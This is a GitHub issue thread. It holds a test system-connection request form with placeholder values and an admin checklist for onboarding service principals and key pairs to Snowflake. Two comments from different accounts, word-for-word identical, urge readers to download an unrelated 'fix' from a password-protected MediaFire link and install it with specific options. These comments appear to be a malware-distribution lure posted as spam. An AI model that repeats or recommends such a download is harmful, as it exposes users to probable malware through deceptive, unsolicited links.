### ISSUE TITLE
[Sys-Conn Request]: Test

### ISSUE THREAD

**Issue by boonwj** [boonwj/testtesttest#88]
### Data Request ID(s)

test

### Environment

PRD

### System Connection Type

SF (SPN)

### Service Principal Name

spn-test

### System IP address(es)

1.1.1.0

### Public Key (if used)

asdf

### Other Information

Testing

### Admin Checklist

---
### SPN Authentication
- [ ] Raise AIS SR to add new role in app registration
  - i.e. session:role:dr_id_lower_case
- [ ] Raise AIS SR to grant SPN role in app
  - i.e. session:role:public & session:role:dr_id_lower_case
- [ ] Store AIS SRs into DCS folder
  - `INSERT DIRECTORY PATH HERE`
- [ ] Check SPN's object ID (OID, using azure cli)
- [ ] PR copy of `notebooks/frontend/onboard_sys_conn_service_principal.py` in `tcs-core`
- [ ] Notify users 
### Key Pair Authentication
- [ ] Generate a `user_id` (using UUID4)
  - Either via: https://www.uuidgenerator.net/ or `python -c 'import uuid; print(uuid.uuid4())'`
- [ ] PR copy of `notebooks/frontend/onboard_sys_conn_service_principal.py` in `tcs-core`
- [ ] Notify users
### For SF Connection
- [ ] Whitelist system IP addresses 
### For API (SPN)
> Access have been granted to:
>
> - SPN Name: spn-...
> - Data Requests: DR_IDs

### For SF (SPN)
> Access have been granted to:
> 
> - SPN Name: spn-...
> - Data Requests: DR_IDs
> - Snowflake Details:
>   - Database: ...
>   - Schema: ...
>   - Role: ...

### For SF (Key Pair)
> Access have been granted to:
>
> - Name: spn-...
> - User ID: UUID value assigned to user
> - Data Requests: DR_IDs
> - Snowflake Details: 
>   - Database: ...
>   - Schema: ... 
>   - Role: ...

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
